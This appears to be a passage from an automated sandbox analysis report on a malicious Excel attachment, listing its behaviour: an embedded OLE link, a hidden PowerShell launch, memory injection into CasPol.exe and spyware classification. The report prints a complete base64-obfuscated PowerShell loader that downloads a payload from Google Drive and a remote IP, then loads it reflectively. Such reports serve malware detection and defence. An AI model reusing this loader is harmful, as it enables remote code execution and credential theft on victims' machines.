NlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 770B0000 page execute and read and write

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	31_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00401806 NtdllDefWindowProc_W,	31_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_004018C0 NtdllDefWindowProc_W,	31_2_004018C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004016FD NtdllDefWindowProc_A,	41_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004017B7 NtdllDefWindowProc_A,	41_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00402CAC NtdllDefWindowProc_A,	42_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00402D66 NtdllDefWindowProc_A,	42_2_00402D66

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044B040	31_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0043610D	31_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00447310	31_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044A490	31_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040755A	31_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0043C560	31_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044B610	31_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044D6C0	31_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_004476F0	31_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044B870	31_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044081D	31_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00414957	31_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_004079EE	31_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00407AEB	31_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044AA80	31_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00412AA9	31_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00404B74	31_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00404B03	31_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044BBD8	31_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00404BE5	31_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00404C76	31_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00415CFE	31_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00416D72	31_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00446D30	31_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00446D8B	31_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00406E8F	31_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00405038	41_2_00405038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0041208C	41_2_0041208C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004050A9	41_2_004050A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0040511A	41_2_0040511A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0043C13A	41_2_0043C13A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004051AB	41_2_004051AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00449300	41_2_00449300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0040D322	41_2_0040D322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044A4F0	41_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0043A5AB	41_2_0043A5AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00413631	41_2_00413631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00446690	41_2_00446690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044A730	41_2_0044A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004398D8	41_2_004398D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_004498E0	41_2_004498E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044A886	41_2_0044A886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0043DA09	41_2_0043DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00438D5E	41_2_00438D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00449ED0	41_2_00449ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0041FE83	41_2_0041FE83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00430F54	41_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004050C2	42_2_004050C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004014AB	42_2_004014AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00405133	42_2_00405133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004051A4	42_2_004051A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00401246	42_2_00401246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_0040CA46	42_2_0040CA46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00405235	42_2_00405235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004032C8	42_2_004032C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00401689	42_2_00401689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00402F60	42_2_00402F60

Document embeds suspicious OLE2 link

Source: A & C Metrology OC 545714677889Materiale.xls	Stream path 'MBD014C1E4E/\x1Ole' : https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainwE{1C\|/".3<AjDl?/a\|MC{qo3~zZ!#5'9)I)2y&=7cp(YmMCYgK?N".D l8_Z}1_py{qXzFlpIU=mvBI2Sc0CDRg?&GtZc*T5XCb5UHP64ExMzL9BeKzDMl0TEy1aHsvRa71roB1scx0pykPKUyTJHlXZ7mtQUGyoycxQYWnnUO1ubUyICMBRB89yONvnDJRoP3nWzFIidyrtxboDDCxVwPNn07HNeFaKcNw9cO4lqjgxGMexY0=o4+B2VE?.PPH
Source: 7B130000.0.dr	Stream path 'MBD014C1E4E/\x1Ole' : https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainwE{1C\|/".3<AjDl?/a\|MC{qo3~zZ!#5'9)I)2y&=7cp(YmMCYgK?N".D l8_Z}1_py{qXzFlpIU=mvBI2Sc0CDRg?&GtZc*T5XCb5UHP64ExMzL9BeKzDMl0TEy1aHsvRa71roB1scx0pykPKUyTJHlXZ7mtQUGyoycxQYWnnUO1ubUyICMBRB89yONvnDJRoP3nWzFIidyrtxboDDCxVwPNn07HNeFaKcNw9cO4lqjgxGMexY0=o4+B2VE?.PPH

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~DFE74F55484018A372.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00416760 appears 69 times

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2286
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2286
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2286	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2286

Yara signature match

Source: Process Memory Space: powershell.exe PID: 2140, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3972, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr

Binary or memory string: org.slneighbors

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@76/50@10/8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

31_2_004182CE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 42_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,

42_2_00410DE1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

31_2_00418758

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,

31_2_00413D4C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

31_2_0040B58D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\7B130000

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-RXIGCE

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7DB7.tmp

Jump to behavior

Source: A & C Metrology OC 545714677889Materiale.xls	OLE indicator, Workbook stream: true
Source: 7B130000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.m.......m..............................................................3......X...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................X...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3......................@.].............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................&......Vck....}..w....@.].....\.......................(.P.......................&.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................&......Vck....}..w....@.].....\.......................(.P.......................&.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.......&.....N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0'i.....UVck......h.....(.P.......................&..... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .d.E.v.I.c.E.C.r.e.D.E.n.T.I.a.l.d.E.p.L.O.Y.M.e.n.t...E.X.E...................&.....@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~...................&.....@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....&.....N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.............................l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......@.].....}..w............0'i.....UVck......h.....(.P.......................&.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......................@b..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.m.......m.......!.......................!.......!......................3........................!.............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3...................... ...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm.........................l....}..w.... .......\.......................(.P.....8.......x.......X...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm.........................l....}..w.... .......\.......................(.P.....8.......x.......X...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...o.....^..l....X.n.....(.P.....8.......x............... .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .d.E.v.I.c.E.C.r.e.D.E.n.T.I.a.l.d.E.p.L.O.Y.M.e.n.t...E.X.E.8.......x...............@.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.8.......x...............@.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x...............l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............8.......8.......@"......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................Yk....}..w............\.......................(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1......)Yk.....bi.....(.P.....................x.......$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................Yk....}..w............\.......................(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............nY......)Yk.....bi.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............nY......)Yk.....bi.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............nY......)Yk.....bi.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w.............nY......)Yk.....bi.....(.P.............................T.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ...............}..w.............nY......)Yk.....bi.....(.P.....................x...............................

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

System information queried: HandleInformation

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
